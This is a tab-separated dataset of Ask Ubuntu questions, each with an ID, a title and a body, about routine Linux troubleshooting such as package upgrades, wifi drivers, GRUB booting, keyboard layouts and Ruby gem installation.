409296	running a script for it 's subdirectories	i 'm trying to run a screenshot making script , but i wa n't it to run in it 's subdirectories . i 'm having let 's say a map called moviemap , there are 3 maps inside with 5 movies in each map . i want to go inside the map moviemap , and than run a script where it will start making screenshots of all the movies inside the 3 maps . how can i do that ? i currently have this but it does n't work : ( # ! /bin/bash basedir= $ 1 for dir in `` $ basedir '' /* do for i in * ; do vcs -n40 -c4 -h 267 -a 400/267 -u0 $ i done done
409299	keyboard layout does n't match the one selected	ubuntu 13.10 sometimes when i start my ubuntu 13.10 computer the keyboard layout does n't match the only one which is installed and selected on my computer . i only have the uk keyboard selected but sometimes when i start up the @ and the `` key are in the wrong place . when i check in system settings the uk keyboard is correctly selected . the only way to get this error to correct itself is to log out and back in again . i do n't touch the keyboard settings and when it starts up again the keyboard layout is correct . any ideas ?
409305	how to stop dist-upgrade from removing mariadb ?	a similar question was asked at partial upgrade - why remove mariadb ? . the answer to that question basically was stating that dist-upgrade is the issue . this question is asking if there is some workaround ( or fix ) . sometimes it is necessary to do a dist-upgrade and not just an upgrade . can we change something in our sources.list ( or elsewhere ) to tell ubuntu to not remove mariadb ? marc @ db01 : ~ $ dpkg -- get-selections | grep mysql libdbd-mysql-perl install libmysqlclient18 install mysql-common install marc @ db01 : ~ $ dpkg -- get-selections | grep maria libmariadbclient18 install mariadb-client-10.0 deinstall mariadb-client-5.5 install mariadb-client-core-5.5 install mariadb-common install mariadb-server install mariadb-server-10.0 deinstall mariadb-server-5.5 install mariadb-server-core-5.5 install marc @ db01 : ~ $ sudo apt-get check reading package lists ... done building dependency tree reading state information ... done marc @ db01 : ~ $ dpkg -- list | grep mysql ii libdbd-mysql-perl 4.020-1build2 perl5 database interface to the mysql database ii libmysqlclient18 5.5.34+maria-1~precise virtual package to satisfy external depends ii mariadb-common 5.5.34+maria-1~precise mariadb database common files ( e.g . /etc/mysql/conf.d/mariadb.cnf ) ii mysql-common 5.5.34+maria-1~precise mariadb database common files ( e.g . /etc/mysql/my.cnf ) marc @ db01 : ~ $ sudo apt-get dist-upgrade -o debug : :pkgproblemresolver=true -o debug : :pkgproblemresolver : :showscores=true reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... starting settings used to calculate pkgproblemresolver : :scores : : important = > 3 required = > 2 standard = > 1 optional = > -1 extra = > -2 essentials = > 100 installedandnotobsolete = > 1 depends = > 1 recommends = > 1 addprotected = > 10000 addessential = > 5000 show scores 10000 linux-image-3.8.0-29-generic [ amd64 ] < 3.8.0-29.42~precise1 > ( kernel ) 6306 dpkg [ amd64 ] < 1.16.1.2ubuntu7.2 > ( admin ) 5409 libc-bin [ amd64 ] < 2.15-0ubuntu10.5 > ( libs ) 5371 debianutils [ amd64 ] < 4.2.1ubuntu2 > ( utils ) 53 libsqlite3-0 [ amd64 ] < 3.7.9-2ubuntu1.1 > ( libs ) 10 mariadb-common [ amd64 ] < 5.5.34+maria-1~precise > ( database ) 8 mysql-common [ amd64 ] < 5.5.34+maria-1~precise - > 5.5.35-0ubuntu0.12.04.1 > ( database ) 6 libmariadbclient18 [ amd64 ] < 5.5.34+maria-1~precise > ( libs ) 6 libmysqlclient18 [ amd64 ] < 5.5.34+maria-1~precise - > 5.5.35-0ubuntu0.12.04.1 > ( libs ) 2 mariadb-client-5.5 [ amd64 ] < 5.5.34+maria-1~precise > ( misc ) 2 mariadb-server-core-5.5 [ amd64 ] < 5.5.34+maria-1~precise > ( misc ) 2 mariadb-client-core-5.5 [ amd64 ] < 5.5.34+maria-1~precise > ( misc ) 1 mariadb-server-5.5 [ amd64 ] < 5.5.34+maria-1~precise > ( misc ) starting 2 investigating ( 0 ) mysql-common [ amd64 ] < 5.5.34+maria-1~precise - > 5.5.35-0ubuntu0.12.04.1 > ( database ) broken mysql-common : amd64 breaks on mysql-client-5.1 [ amd64 ] < none > ( none ) conflicts//breaks against version 10.0.7+maria-1~precise for mariadb-client-10.0 but that is not instver , ignoring considering mariadb-client-5.5 : amd64 2 as a solution to mysql-common : amd64 8 added mariadb-client-5.5 : amd64 to the remove list broken mysql-common : amd64 breaks on mysql-client-core-5.1 [ amd64 ] < none > ( none ) considering mariadb-client-core-5.5 : amd64 2 as a solution to mysql-common : amd64 8 added mariadb-client-core-5.5 : amd64 to the remove list broken mysql-common : amd64 breaks on mysql-server-core-5.1 [ amd64 ] < none > ( none ) considering mariadb-server-core-5.5 : amd64 2 as a solution to mysql-common : amd64 8 added mariadb-server-core-5.5 : amd64 to the remove list conflicts//breaks against version 5.5.34+maria-1~precise for mariadb-galera-server-5.5 but that is not instver , ignoring fixing mysql-common : amd64 via remove of mariadb-client-5.5 : amd64 fixing mysql-common : amd64 via remove of mariadb-client-core-5.5 : amd64 fixing mysql-common : amd64 via remove of mariadb-server-core-5.5 : amd64 investigating ( 0 ) libmariadbclient18 [ amd64 ] < 5.5.34+maria-1~precise > ( libs ) broken libmariadbclient18 : amd64 depends on libmysqlclient18 [ amd64 ] < 5.5.34+maria-1~precise - > 5.5.35-0ubuntu0.12.04.1 > ( libs ) ( = 5.5.34+maria-1~precise ) considering libmysqlclient18 : amd64 6 as a solution to libmariadbclient18 : amd64 6 removing libmariadbclient18 : amd64 rather than change libmysqlclient18 : amd64 investigating ( 0 ) mariadb-server-5.5 [ amd64 ] < 5.5.34+maria-1~precise > ( misc ) broken mariadb-server-5.5 : amd64 depends on mariadb-client-5.5 [ amd64 ] < 5.5.34+maria-1~precise > ( misc ) ( > = 5.5.34+maria-1~precise ) considering mariadb-client-5.5 : amd64 2 as a solution to mariadb-server-5.5 : amd64 1 removing mariadb-server-5.5 : amd64 rather than change mariadb-client-5.5 : amd64 investigating ( 0 ) mariadb-server [ amd64 ] < 5.5.34+maria-1~precise > ( database ) broken mariadb-server : amd64 depends on mariadb-server-5.5 [ amd64 ] < 5.5.34+maria-1~precise > ( misc ) ( = 5.5.34+maria-1~precise ) considering mariadb-server-5.5 : amd64 1 as a solution to mariadb-server : amd64 0 removing mariadb-server : amd64 rather than change mariadb-server-5.5 : amd64 done done the following packages will be removed : libmariadbclient18 mariadb-client-5.5 mariadb-client-core-5.5 mariadb-server mariadb-server-5.5 mariadb-server-core-5.5 the following packages will be upgraded : libmysqlclient18 mysql-common 2 upgraded , 0 newly installed , 6 to remove and 0 not upgraded . need to get 957 kb of archives . after this operation , 107 mb disk space will be freed . do you want to continue [ y/n ] ? n abort . marc @ db01 : ~ $ now that mariadb has updated their ppa : marc @ db01 : ~ $ apt-cache show mysql-common | grep version version : 5.5.35+maria-1~precise version : 5.5.35-0ubuntu0.12.04.2 version : 5.5.35-0ubuntu0.12.04.1 version : 5.5.22-0ubuntu1 marc @ db01 : ~ $ apt-cache show libmysqlclient18 | grep version version : 5.5.35+maria-1~precise version : 5.5.35-0ubuntu0.12.04.2 version : 5.5.35-0ubuntu0.12.04.1 version : 5.5.22-0ubuntu1 marc @ db01 : ~ $ sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
409306	how to create keyboard shortcut that toggle start/stop .jar file ?	# this is for running the aioremote server from my ubuntu 12.04 lts laptop to run with my android device as remote control mouse pad and wireless file transfer . i know how to create keyboard shortcut which execute .jar file but i 'd like to know how to make a shortcut that would toggle ( start/stop ) the program either with .jar or .sh files provided by the program developer . on the same note , is there any way that i can edit the keyboard shortcut message that pops up on pressing the `` super '' key ? i am not sure if this make any more sense but i am running ubuntu 12.04 lts 64bit with 3.13 mainline kernel .
409307	can not change login background / also not auto changing	i have two machines running ubuntu 13.10 . one of the machines is changing the login wallpaper while choosing an account . i would like to have this on the other machine as well . but nothing changes while changing background . i tried ubuntu tweak to choose a default login background , but all the options are greyed out . i have searched the internet . i placed the background already in the default folder : usr/share/background . changed the owner to root like the other wallpapers and also the permissions . nothing changes . anyone an idea what i can do to let this work ? -- > found out that there was a little lock in ubuntu tweak . my ubuntu tweak is not greyed out anymore . i changed the login background ... but it does not change after logging out to what i want ... is just became black .
409308	`` package is in a very bad inconsistent state - you should reinstall it before attempting configuration . ''	recently , i was installing the new version from 13.04 to 13.10 ubuntu while also watching a video . well , guess what happened , my desktop crashed for like 4 minutes and then upon gaining access to the desktop again everything seemed messed up like box symbols where characters should be . i know it was a bad idea but i decided to reboot halting the installation process and now i am stuck with this error . dpkg : error processing unity-lens-photos ( -- configure ) : package is in a very bad inconsistent state - you should reinstall it before attempting configuration . errors were encountered while processing : untity-lens-photos e : subprocess /usr/bin/dpkg returned an error code ( 1 ) . and it pretty much pops up everytime i try to upgrade , or install anything . this was after i finished updating the rest of my files . i have tried many things and read many threads . i am really lost right now , please help . also i have no access to a panel and i am currently trying everything in the terminal . attempts to install a gnome panel have been halted by the error .
409309	switch between the keyboard layouts of the xserver/xorg ?	i had added up english ( us ) , belgian ( alternative ) , tamil keyboard layouts using the gui . how do i easily switch between these three layouts from terminal ?
409310	error while loading shared libraries ; can not open shared object file : no such file or directory	the program evince complains that it ca n't find libfreetype.so.6 ; however i clearly have the file and its included in my ld_library_path ; furthermore i have another program which uses libfreetype6 and is able to run just fine . what 's going on here ? jbud @ jb-pc ~ > evince evince : error while loading shared libraries : libfreetype.so.6 : can not open shared object file : no such file or directory jbud @ jb-pc ~ > ldd /usr/bin/evince | grep freetype libfreetype.so.6 = > /usr/local/lib/libfreetype.so.6 ( 0x00007f912179d000 ) jbud @ jb-pc ~ > file /usr/local/lib/libfreetype.so.6 /usr/local/lib/libfreetype.so.6 : symbolic link to `libfreetype.so.6.11.1' jbud @ jb-pc ~ > file /usr/local/lib/libfreetype.so.6.11.1 /usr/local/lib/libfreetype.so.6.11.1 : elf 64-bit lsb shared object , x86-64 , version 1 ( sysv ) , dynamically linked , buildid [ sha1 ] =0x21a4b8005e0c9a42af001b35fb984f4e25efc71c , not stripped jbud @ jb-pc ~ > echo $ ld_library_path /usr/lib/ : /usr/lib64/ : /usr/lib/x86_64-linux-gnu/ : /usr/local/lib/ jbud @ jb-pc ~ > ldd jdrive/jstuff/work/personal/noengine/client | grep freetype libfreetype.so.6 = > /usr/local/lib/libfreetype.so.6 ( 0x00007feb5ac89000 )
409315	need an advice about permissions of /var/www folder	as you already know while web development each time to access/edit or to do anything else in /var/www directory , we must either grant root permissions or change permissions of directory for all usersi found a lot of answers for changing permissions of /var/www directory . but i 'd like to know which one of the following is a good habit . to change directory permissions for current user or ( generally ) for all user to add a new user group and grant permissions for that group for managing /var/www leave all as it was and try this ... ( your solution )
409318	how can i setup a different user with unique sound server options	i 'd like to setup a separate user account that only loads alsa sound server so i can run jackaudio over the top without worrying about how it interacts with pulseaudio/phonon . i have multiple sound servers installed that i use differently with multiple desktop environments . the base of my install is xubuntu 13.04lts raring . but i also have kde-plasma , mate , cinnamon , lxde , jwm , and some others installed for testing and other purposes . if this is easier in one desktop environment than the other , i 'm all for that . my normal general computer use really finds pulseaudio 's options great , but for my audio recording/producing stuff that uses jackaudio , it always messes everything up every time i need to start it up . making getting all my jackaudio settings back tedious . i 'd rather just login to a new user and have the ability to do all my audio work with everything stripped back to alsa and run jackaudio over it . any help ?
409320	connect to virtual host from local network	configured bind9 , apache and all related services . problem is ; i am able to connect to my sites from outside , www.mysite.com ( example ) is ok . in such case my - client ip is different than servers ip . but when i try to connect the same way but through common modem to which my server is connected too , no connection can be established . i mean , me with my laptop with local ip 192.168.1.2 can not connect to server with local ip 192.168.1.10 by using www.mysite.com . only with 192.168.1.10/mysite.com . what did i miss ?
409322	do i have the wrong wlan driver ? wifi behaving strangely	i 've got a problem with my wifi . it will only sometimes detect certain networks . coincidentally the networks that only sometimes show up are the two networks i use most often : my home and work wifi . `` workwifi '' is unsecured , `` homewifi '' is secure . that probably has nothing to do with it but they are the only networks i 'm having trouble with . here 's a typical scenario : i get to work and turn my laptop on , no wifi connection . i click on the wifi symbol on the menu bar and find a list of wifi connections but not `` workwifi , '' the one i want . so i try a bunch of stuff , i 'll disable/enable wireless , disable/enable networking , each about a dozen times . restart the computer . disable/enable wifi again . restart again . eventually i 'll slam the screen shut in frustration and let it hibernate for an hour or so . then i 'll return and repeat the enable-disable-restart process . if i 'm lucky some magical combination of restarts and hibernates and smashing my head on my desk , will get me wireless network i 'm looking for . then i can connect and start interneting . sometimes , it 'll never show up . now i 'll leave work and go home . when i get home i 'll open up my computer and sometimes it connects without issue and other times ... no wifi . i 'll click on the wifi icon and i swear it will list twenty wifi signals . it 's like it 's picking up the wifi router in every sigle house on my block except for my router ! my router is not broadcasting a hidden ssid . it just is n't on the list . i 'll now repeat the restart/enable/disable/smash head on desk routine until for some reason the ssid i 'm looking for shows up or until i give up . i 've been trying to find solutions in other `` networking '' threads here but have n't found anything useful . but these commands are often requested , so i 'll give you that info right now : ~ $ lspci | grep network 03:00.0 network controller : intel corporation centrino advanced-n 6205 [ taylor peak ] ( rev 34 ) ~ $ sudo lshw -c network *-network description : wireless interface product : centrino advanced-n 6205 [ taylor peak ] vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 34 serial : a0:88 : b4:30:4b:08 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.8.0-35-generic firmware=18.168.6.1 latency=0 link=no multicast=yes wireless=ieee 802.11abgn resources : irq:42 memory : c0500000-c0501fff does anyone have even the slightest idea of what might be wrong ? any help is greatly appreciated . my best guesses right now are that i might have the wrong driver or that the driver might not be communicating with the kernel properly . how can i check for these ?
409323	using grub to boot a linux system on a different device ?	i bought a new ssd drive with the idea of running my ubuntu system on it and leaving the other two sata drives ( which are configured in a raid array ) for storage only . ubuntu installed with no problem , but it turns out that my motherboard does n't support ahci and it does n't see the ssd drive at all -- so i ca n't configure it to boot from the ssd . can i , theoretically , install grub on the sata array and configure it so it boots the ssd ? when i run grub-mkconfig , it identifies the system installed in the ssd but it spits out the following error : # # # begin /etc/grub.d/30_os-prober # # # error : ddf1 : seeking device `` /dev/dm-2 '' to 18446744073709421056 error : hpt37x : seeking device `` /dev/dm-2 '' to 4608 error : hpt45x : seeking device `` /dev/dm-2 '' to 18446744073709547008 error : isw : seeking device `` /dev/dm-2 '' to 18446744073708469760 error : sil : seeking device `` /dev/dm-2 '' to 18446744073709289984 error : ddf1 : seeking device `` /dev/dm-2 '' to 18446744073709421056 error : hpt37x : seeking device `` /dev/dm-2 '' to 4608 error : hpt45x : seeking device `` /dev/dm-2 '' to 18446744073709547008 error : isw : seeking device `` /dev/dm-2 '' to 18446744073708469760 error : sil : seeking device `` /dev/dm-2 '' to 18446744073709289984 error : ddf1 : seeking device `` /dev/dm-2 '' to 18446744073709421056 error : hpt37x : seeking device `` /dev/dm-2 '' to 4608 error : hpt45x : seeking device `` /dev/dm-2 '' to 18446744073709547008 error : isw : seeking device `` /dev/dm-2 '' to 18446744073708469760 error : sil : seeking device `` /dev/dm-2 '' to 18446744073709289984 error : ddf1 : seeking device `` /dev/dm-2 '' to 18446744073709421056 error : hpt37x : seeking device `` /dev/dm-2 '' to 4608 error : hpt45x : seeking device `` /dev/dm-2 '' to 18446744073709547008 error : isw : seeking device `` /dev/dm-2 '' to 18446744073708469760 error : sil : seeking device `` /dev/dm-2 '' to 18446744073709289984 found ubuntu 12.04.3 lts ( 12.04 ) on /dev/sdc1 menuentry `` ubuntu , amb el linux 3.8.0-29-generic ( on /dev/sdc1 ) '' -- class gnu-linux -- class gnu -- class os { insmod part_msdos insmod ext2 set root= ' ( hd2 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 25ad7a52-d1b9-4d23-81b0-de24a593e8e5 linux /boot/vmlinuz-3.8.0-29-generic root=uuid=25ad7a52-d1b9-4d23-81b0-de24a593e8e5 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.8.0-29-generic } and when i select the option for the sdc ( the sdd drive ) in grub it says : error : no such device : cde9dac2-0db5-41f7-a35e-5462c02e3c35 error : hd2 can not get c/h/s values error : you need to load the kernel any help will be greatly appreciated ... : )
409326	problems mounting nexus 7	i am having problems connecting my nexus 7 to my ubuntu 13.10
409327	sudo chmod +x leads to `` can not access [ file ] permission denied ''	i 'm trying to install matlab using super user privileges . the reason i want to do this is because the installer is unable to create folders , which is necessary . nothing happens when i do sudo install -v and when i try chmod +x install i get chmod : can not access 'install ' : permission denied the output of ls -la install is -r-xr-xr-x 1 root root 24293 jan 16 2013 install i do n't know if this is relevant , but i am trying to install from a mounted image .
409328	why do i have so many options in install ? what do i pick ?	i have a windows 8 desktop and i 'm trying to install ubuntu . in my computer on windows i see two drives ( c : for windows and d : empty ) when i try to install ubuntu , there 's a big list of options of which drive to pick . what do i pick ? in the first image , it 's the list of options showing in the `` device for boot loader installation '' menu . in the second image , it 's showing the main window with the list of drives . what drive do i pick ? i want to install ubuntu on the d : .
409330	wireless/wifi not detected after installing updates for ububtu12.04 lt on dell inspiron 3537 laptop	i installed reguralar ubuntu 12.04lt updates through update manager . after installing updates it asked for system restart.i did the same and found that machine is not able to detect network ( wireless as well as wired ) . please help me . laptop is dell-inspiron â 3537 model .
409331	ubuntu 12.04 restarts into a black screen	i installed a few updates in my ubuntu 12.04 . after rebooting to complete the installation , and after the bios screen , it goes black , shows the login prompt in the command line mode for a second , and then goes black with a blinking cursor . it goes completely black after a few minutes . going to recovery mode and using older kernels does not seem to make a difference . how can i fix this ? thanks
409334	ubuntu 12.04 not shutting down	i am currently unable to shut down my laptop with ubuntu 12.04 . the screen just freezes during the shutdown process and i have to use the power switch . if i press esc during the shutdown the last messages before freezing are : /etc/rc0.d/s90halt : 2 : /etc/default/halt : init_halt : not found * will now halt sometimes , but now always , it tells me that killing all remaining processes has failed . none of the answers here have been of help so far .
409335	after upgrade to ubuntu 13.04 settings work incorrectly	i upgrade my ubutu to 13.04 version and after this i ca n't add some languages or change background . even i delete some apps from left bar but after reboot they still here . what can i do in such situation ?
409336	ubuntu for toshiba c55-a-1n1	i want to install ubuntu whatever version , for this toshiba laptop model ( toshiba satellite c55-a-1n1 ) . at the moment it has windows 8.1 and it 's booting in uefi mode . can someone help me about , if can i install ubuntu in this one ? what version ? and how ? thank you and good vibe . om
409337	how do i set my coomputer to restart on crash ?	i have a computer that occasionally crashes . i am using teamviewer to access it remotely , but i obviously lose access when it crashes . is it possible to switch the default behavior from shutting down to restarting ? then i could put teamviewer in my startup programs and solve my post-crash access issues .
409338	bluetooth automatically enables on lenovo t440s	i want to disable bluetooth on my lenovo t440s , which is running 12.04 lts . i can do it manually , but on every startup it enables the bluetooth again . is there a way to ensure that a simple startup wont automatically enable bluetooth ?
409339	how to install ppstream on ubuntu 13.10 ?	how do i install ppstream on ubuntu13.10 ? i tried getting the files and installing it . ppstream for gnu/linux ubuntu 8.04+ distro . i get : can not install'mplayer : i386' i also tried going to software centre > search > mpayer installing that then try it again . i still get the same message . i search on askubuntu.com for ppstream and also google all i get is http : //thanhsiang.org/faqing/node/167 or how to install ppstream on 12.04 ?
409340	how to find a keyboard shortcut , globally : ctrl-shift-p	i 've been using sublime for quite some time now and bringing up the palate with 'ctrl-shift-p ' has always been my go to shortcut . all this in ubuntu 13.10 . however , i recently lost the ability to use this anymore and had to change it to q instead of p. now , i tried looking for shortcuts and seeing if something is overriding it but ca n't seem to do so . is there any way , other than uninstalling everything , to find this assignment ? if anyone knows of a program which uses 'ctrl-shift-p ' as a shortcut , please let me know .
409342	gps-data logger does not communicate to computer	i have a canmore gps-data logger dongle gt-730fl/s does not work properly . apparently , it 's not possible communication between device and computer ( ubuntu 13.10 ) to transfer data using usb port . in the list of usb devices connected to the computer it appears as `` prolific technology , inc. pl2303 serial port '' . then i want to know how can i access to this kind of device , to fix the problem or , at least to get information to fix the problem . thank you very much .
409343	graphics problem with cedarview and log-in screen	i 've recently encountered problems with my netbook when i dabbled with the graphics driver . i recently tried to install the `` cedar trail in dkms format '' through additional drivers in system settings and got that error in installation that somehow screwed my system up so it ca n't boot . after numerous hours on google and trying out the suggested fixes , i finally just settled on reinstalling ubuntu . however now i have these problems : after re-installing ubuntu , the log-in screen after waking from suspend is filled with multi-colored vertical lines with a square white box where the mouse pointer should have been . i 've encountered this error during my original installation but was able to fix it , although already forgetting how since its been almost a year . i 've tried adding nomodeset , acpi_backlight=vendor , removed quiet splash -- everything , but the outcome is the same . i have no choice but to ctrl +alt+ f1 and either restart lightdm or to just sudo poweroff or reboot . attempting to try to fix above problem , i 've resorted to again installing the graphics driver . i downloaded cedarview-graphics-drivers on synaptic ( that goes with cedarview-drm ) and the cedarview vaapi driver and now my netbook wo n't boot . it gets stuck in the boot screen with the ubuntu logo with the five dots under it and the message that /tmp is not ready , and even if i press s or m to skip or manually restore , nothing happens . also , can not continue with the failsafe graphics on recovery , and already ran file system check and broken dependencies . removing cedartrail does not do anything either . could there be a way to fix it without having to reinstall ubuntu again ? i just want my netbook to go back as it was during the original installation , with the log-in screen fixed . although now i ca n't boot unless in recovery mode . my netbook is an acer aspire d270 ( intel atom n2600 , so it 's intel gma 3600 ) , running on ubuntu 12.04.04 32-bit .
409345	dual hardrive ubuntu installation	i have a computer with two hardrives . one of them has windows 7 installed on it . the other is blank and formated . i was wondering how i can install ubuntu onto the second hardrive but not the first .
409350	how do i add a qrc file to my ubuntu touch qml project ?	my ut qml project makes use of a set of images , and i was planning use them via `` qrc : ///pathtoimages/myimage.png '' style of url . in ubuntu sdk , i can `` add new ... qt / qt resource file '' . the file is created , but then i get the following error saying : what does the error mean ? can i safely ignore it ? will the package generation include my images ? [ edit ] after further investigation , it seems that using qt resources files only makes sense when using qmake , to embed some file into the binary . so it might be just useless in ubuntu sdk .
409356	lubuntu 13.10 alternate install with luks lvm partition `` adding additional '' step failed	setting up a dual boot lubuntu and windows 7 system on an old gateway netbook . there are 3 existing windows partitions , and during the lubuntu install , i created two logical partitions , a small one for /boot and a large one ~173g to be a luks encrypted physical volume for lvm . after the encryption completed , next day : - ) , the installation continued and allowed me to enter the luks passphrase and setup my three lvm volumes ( root , swap and home ) . it continued on and installed the `` base system '' successfully , but failed in the next step `` adding additional ... '' . sorry , i may not recall that install step name correctly . i continued with install `` grub2 '' and completed the rest of the install steps . but now when rebooting , i get the grub panel with ubuntu , ubuntu with additional options and windows , as expected . but when i select ubuntu , i was expecting the next thing to be a prompt to enter the luks passphrase . instead , i end up in an ash shell ( initramfs ) . i 'm guessing , that my problem has to do with the one install step that failed ( duh ! ) , so i tried `` rescue '' , got into a shell and df confirmed that the lvm volumes i expected are there , have plenty of space and mounted where i expected . my other thought on why the install might of failed is because my network certificate clearly would of expired during the overnight run required for the encryption setup to complete . so if that install step wanted to reach out across the internet , it could n't . i tried to go through the install again , but when i reached the partitioning step , it did n't detect that /dev/sda6 was already an encrypted volume and none of the lvm volumes showed up . yikes ! i canceled that idea . instead i downloaded the desktop version of lubuntu and booted the trial so i could use gparted to confirm i had n't destroyed /dev/sda6 . fortunately , it shows it as a 173gb crypt-luks . whew ! but of course , ca n't show me anything about the lvm volumes . anyway , i figured i better see if anyone had some suggestions before i mess up , and have to do another ~20 hour encryption setup run of /dev/sda6 . i suspect something is missing in the crypt-luks setup . thanks .
409357	installing rails 12.04 error	i have followed all stapes from this page https : //www.digitalocean.com/community/articles/how-to-install-ruby-on-rails-on-ubuntu-12-04-lts-precise-pangolin-with-rvm it all goes well until command to install rails gem install rails i get this error : error : while executing gem ... ( gem : :remotefetcher : :unknownhosterror ) no such name ( http : //api.rubygems.org/api/v1/dependencies ? gems=activerecord-deprecated_finders ) on each new try error message shows different gem dependencies ? gems= ... ... . any advices on this issue ? edit : here is the full stack trace after executing coomand gem install rails -v head https : //api.rubygems.org/latest_specs.4.8.gz 302 moved temporarily head https : //s3.amazonaws.com/production.s3.rubygems.org/latest_specs.4.8.gz 200 ok get https : //api.rubygems.org/latest_specs.4.8.gz 302 moved temporarily get https : //s3.amazonaws.com/production.s3.rubygems.org/latest_specs.4.8.gz 200 ok head http : //api.rubygems.org/latest_specs.4.8.gz 302 moved temporarily head http : //production.s3.rubygems.org/latest_specs.4.8.gz 200 ok get http : //api.rubygems.org/latest_specs.4.8.gz 302 moved temporarily get http : //production.s3.rubygems.org/latest_specs.4.8.gz 200 ok head https : //api.rubygems.org/api/v1/dependencies 302 moved temporarily head https : //bundler.rubygems.org/api/v1/dependencies 200 ok head http : //api.rubygems.org/api/v1/dependencies 302 moved temporarily head http : //bundler.rubygems.org/api/v1/dependencies 200 ok get https : //api.rubygems.org/api/v1/dependencies ? gems=rails 302 moved temporarily get https : //bundler.rubygems.org/api/v1/dependencies ? gems=rails 200 ok get http : //api.rubygems.org/api/v1/dependencies ? gems=rails 302 moved temporarily get http : //bundler.rubygems.org/api/v1/dependencies ? gems=rails 200 ok get https : //api.rubygems.org/api/v1/dependencies ? gems=railties 302 moved temporarily get https : //bundler.rubygems.org/api/v1/dependencies ? gems=railties 200 ok get http : //api.rubygems.org/api/v1/dependencies ? gems=railties 302 moved temporarily get http : //bundler.rubygems.org/api/v1/dependencies ? gems=railties 200 ok get https : //api.rubygems.org/api/v1/dependencies ? gems=actionmailer 302 moved temporarily get https : //bundler.rubygems.org/api/v1/dependencies ? gems=actionmailer 200 ok get http : //api.rubygems.org/api/v1/dependencies ? gems=actionmailer 302 moved temporarily get http : //bundler.rubygems.org/api/v1/dependencies ? gems=actionmailer 200 ok get https : //api.rubygems.org/api/v1/dependencies ? gems=activerecord 302 moved temporarily get https : //bundler.rubygems.org/api/v1/dependencies ? gems=activerecord 200 ok get http : //api.rubygems.org/api/v1/dependencies ? gems=activerecord 302 moved temporarily get http : //bundler.rubygems.org/api/v1/dependencies ? gems=activerecord 200 ok get https : //api.rubygems.org/api/v1/dependencies ? gems=actionpack 302 moved temporarily get https : //bundler.rubygems.org/api/v1/dependencies ? gems=actionpack 200 ok get http : //api.rubygems.org/api/v1/dependencies ? gems=actionpack 302 moved temporarily get http : //bundler.rubygems.org/api/v1/dependencies ? gems=actionpack 200 ok get https : //api.rubygems.org/api/v1/dependencies ? gems=activesupport 302 moved temporarily get https : //bundler.rubygems.org/api/v1/dependencies ? gems=activesupport 200 ok get http : //api.rubygems.org/api/v1/dependencies ? gems=activesupport 302 moved temporarily get http : //bundler.rubygems.org/api/v1/dependencies ? gems=activesupport 200 ok get https : //api.rubygems.org/api/v1/dependencies ? gems=activemodel 302 moved temporarily get https : //bundler.rubygems.org/api/v1/dependencies ? gems=activemodel 200 ok get http : //api.rubygems.org/api/v1/dependencies ? gems=activemodel 302 moved temporarily get http : //bundler.rubygems.org/api/v1/dependencies ? gems=activemodel 200 ok get https : //api.rubygems.org/api/v1/dependencies ? gems=sprockets-rails 302 moved temporarily error : while executing gem ... ( gem : :remotefetcher : :unknownhosterror ) no such name ( https : //api.rubygems.org/api/v1/dependencies ? gems=sprockets-rails )
409358	why does ubuntu make larger compiled kernel file ( .deb ) than debian does ?	when i compile a kernel in ubuntu , it is 40 % bigger than in debian ( with the same .config ) . why ? is it because of little different versions ? 40 % seems too much to me . both are up to date , ubuntu 13.10 and debian 's nightly build . ubuntu : lz4 - r94 , gcc 4:4.8.1 debian lz4 - r109 , gcc 4:4.8.2
409359	upgrade from 10.04 to 12.4 shutdown in the middle of installation , and now i cant even run it live	i have had ubuntu 10.04 until yesterday , when my dad got home with a disc that has 12.4 on it , i quickly put it into the laptop and started the install , and everything was going fine , but apparently the fan on my laptop failed to continue running , and the computer shut off without warning . so the installation failed and now the computer boots to a grub . i tried to re install changing the settings of the installation , but every time has yielded a kernel error , and booting it live does the same thing , so i tried installing artist x and mint linux too , same thing , it waits a really long time and gives me a kernel error . how can i fix this ? please help .
409361	why does lxsession looks different than normal ?	i sshed into a lubuntu 12.04 box . i then did lxsession . the problem : it looked totally different than the computer i was sshing into ! how would i use ssh to have a desktop that looks reasonably similar to what i am sshing into . it did n't even have dropbox in the bottom right !
409363	command for starting a service or bring up the program if already running	say i have a shortcut which runs the command , skype . this will work fine and will open skype as requested . but say i press it again . nothing happens because it tries to open skype again . is there a command i can give which will open a program iff not open , else it will switch to the active process of it ?
409365	finding amount of memory usage of a command in bash	i wrote a program and now i need to measure it 's performance so i use time to find timings but is there any command like time that i could run my program under it and have the amount of memory used by my program ? ( like what time does ) i 'm programming in c/c++ , java , python etc . so i need a uniform tool ( like time ) to measure memory usages . tnx alot !
409366	grub screen appears after install	i installed ubuntu 12.0 to run from usb ( flash drive ) . when i restarted i clicked to load ubuntu and the grub screen appeared . how do i get the os to run/ i did the uninstall/reinstall thing but can not get the os to run . thank you
409367	implement filter in unity-scopes with python	a lot of the unity-scopes do not work in ubuntu ( for example the unity-scope-gmusicbrowser ) , thus i 've tried to `` correct '' them in order to get results in the dash . ok , i succeeded in doing this ( for the file : /usr/share/unity-scopes/gmusicbrowser/unity_gmusicbrowser_deamon.py : the `` corrected '' code : https : //gist.github.com/wa4557/d6cc4ec5354bbb95042b ( is it ok to post it here , even if the main part is not from me ? ) ) . this works flawlessly , and results from gmusicbrowser are now visible in the music-dash , like i want them to show up . but i have still one small problem : how can i implement the available filters in the scopes ? i think the relevant lines in the code are ( line 372 ff ) : def do_get_filters ( self ) : ' '' adds filters ' '' fs = unity.filterset.new ( ) # if filters : # return fs unfortunately however there 's everything commented out , and there is no serious documentation or something similar filters in the scope would let me to filter music , so for example to select only rock music etc . ; i think the screenshot explains what i mean ( it 's german ) . as you can see , there are no results even though i have a lot of music from the 00s in my collection ... edit : i have found a scope with a similar loader ( unity-gdrive-scope ) : https : //gist.github.com/wa4557/e3a9cdef5806dc3c13c9 , where the filters are added . frankly i do n't understand how this works . but there is definitely something in the do_get_filters function ...
